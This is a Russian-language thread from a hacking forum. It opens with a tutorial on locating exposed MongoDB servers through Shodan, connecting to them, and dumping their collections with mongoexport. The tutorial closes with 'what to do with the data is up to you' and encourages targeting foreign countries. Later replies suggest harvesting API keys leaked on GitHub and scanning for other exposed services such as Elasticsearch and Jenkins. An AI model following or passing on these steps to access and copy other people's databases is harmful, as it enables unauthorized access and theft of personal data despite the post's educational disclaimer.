• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Утечки данных MongoDB. MongoDB Data Leakage

xdoom

(L3) cache
Пользователь
Регистрация
19.01.2019
Сообщения
235
Реакции
311
2828


Заметка не призывает к деструктивным действиям, вся информация даётся в образовательных целях.
Помните, неправомерный доступ к компьютерной информации является уголовно-наказуемым преступлением.

Новости об утечках данных перестали удивлять. Целью воровства информации зачастую становятся персональные данные.
Основная причина возможности утечки информации - неверная настройка доступа к базам данных [1].
В заметке отражен пример доступа к базе данных (БД) MongoDB. Поиск открытых БД будем производить в поисковике Shodan.

Для начала необходимо установим клиент Shodan для Python[2].

$ easy_install shodan

После полной установки, необходимо инициализировать клиент, указав свой API-key. Ключ можно найти в профиле пользователя Shodan, предварительно зарегистрировавшись.
Где взять API-key не регистрируясь рассказано в статье xss.pro [3]

$ shodan init <API-key>

Получив сообщение Successfully initialized можно приступать к поиску.
Поиск удобнее вести, указывая определенный продукт, страну и город. Учтите, что порядочные исследователи не выбирают целью исследования Россию.
Поэтому в качестве top-level domain можно выбрать страну вероятного противника.

$ shodan search product:mongodb country:ru city:washington

Вывод команды может выдать большой список данных, неудобных для разбора. Для удобства можно скачать данные в формате JSON.

$ shodan download mnogodb product:mongodb country:us

Далее для анализа данных используйте параметр parse, а также указание необходимых полей для вывода и разделитель данных.

$ shodan parse --fields ip_str,org --separator , mnogodb.json.gz

Также полученные данные можно конвертировать в файлы формата xlsx и csv для последующего анализа.

$ shodan convert mnogodb.json.gz xlsx

После получения необходимых адресов серверов баз данных, можно подключиться к ним используя клиент MongoDB [4].
Установка клиента осуществляется просто (на примере Ubuntu Linux):

$ sudo apt install mongodb

Подключение к серверу БД и просмотр баз:

$ mongo <ipaddress>
$ show dbs

После нахождения интересующей вас информации можно скопировать данные определенной таблицы (коллекции, в терминах БД) [5]:

$ mongoexport --db <dbname> --collection <collectionname> --out dbexport.json

Что делать с полученными данными - решать вам.

[1] https://docs.mongodb.com/manual/security/
[2] https://cli.shodan.io/
[3] https://xss.pro/threads/27486/
[4] https://docs.mongodb.com/manual/mongo/
[5] https://docs.mongodb.com/manual/reference/program/mongoexport/index.html

Оригинал
 
Вот жеж б...


На ссылки смотрите и на даты размещения, а так же сноска порадовала:

Кстати говоря, используя небольшую хитрость и опять же поиск, только на этот раз по GitHub, можно найти некоторое количество API-ключей, оставленных в открытых репозитариях их неосторожными владельцами.


xdoom ты и есть ashotog, или хабровчане у нас контент тырят? (я просто почему то считал, что на хабре исключительно авторский контент допускается, а не "своими словами" переделка) =)
 
ты и есть ashotog, или хабровчане у нас контент тырят?
Спасибо, мне это льстит. Но, увы, я не ashotog. Он сотрудник Device Lock, а я нет :).

Попробую внести ясность, недавно на знатном ресурсе проскакивала статья и отчет, в которых говорилось что русские хакеры самые быстрые. Я, похоже, оказался шустрее)))

В статье не Хабре указана ссылка на канал, пару недель назад на котором была новость, что планируется статья по поиску открытых БД. Идея показальсь мне интересной, и я написал заметку. Пораньше.
 
Никто ничего ни у кого не крал. Действительно я неделю назад в канале провел опрос https://t.me/dataleak/769 и по его результатам написал статью и ровно в этот день, как я закончил верстку вышла статья тут. Я на нее поставил ссылку у себя в самом конце.

Что касается GitHub и поиска ключей - ну это же просто очевидная вещь, ей пользуется очень много народа.
 
Я на нее поставил ссылку у себя в самом конце.
Спасибо. Наши плоды умственного труда действительно разнятся (например, скриншоты с одинаковым запросом), хотя в некоторых местах удивительно похожи.
 
ashotog Думаю, понятны моменты, которые меня (и не меня одного, как оказалось) натолкнули на мысль о неоригинальности статьи (хабр). А так же добавим то, что практически все материалы, указанные в "сопроводиловке" к ней - взяты из этой ветки. Однако вы правы, вы там указали и наш форум, я этого не заметил (иначе бы моего замечания к вашей статье и не было). В любом случае, если останетесь с нами - всегда рады =)
P.S> надеюсь что и наши парни в скором времени проскочат в новостях, как "очередной исследователь обнаружил в открытом доступе ахуллиард учетных записей,принадлежащих ..." благодаря вашим усилиям ;)
 
Последнее редактирование:
Учитывая неуникальность материала, немного переработал и дополнил заметку - https://xss.pro/threads/27998/

Хорошо получилось.

У меня новая версия Lampyre вообще стала не юзабельной, весь GUI мелкий, как увеличить штрифт не понятно. До 1.3.0 все было нормально, улучшили блин ;)

Кстати, еще на заметку - вот такой поисковик очень не плохие результаты выдает binaryedge.io
 
Полезный скрипт перешёл на новый движок, и теперь использует Binaryedge.io. Обзор скрипта можно почитать здесь, тема утечки данных активно обсуждается

В новой версии появилась поддержка большего количества уязвимостей утечек данных:
  • Elasticsearch
  • CouchDB
  • MongoDB
  • Gitlab
  • Rsync
  • Jenkins
  • Sonarqube
  • Kibana
  • CassandraDB
  • RethinkDB
  • и листинг директории

Описание API запросов - https://docs.binaryedge.io/api-v2/

Обзор от автора скрипта:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх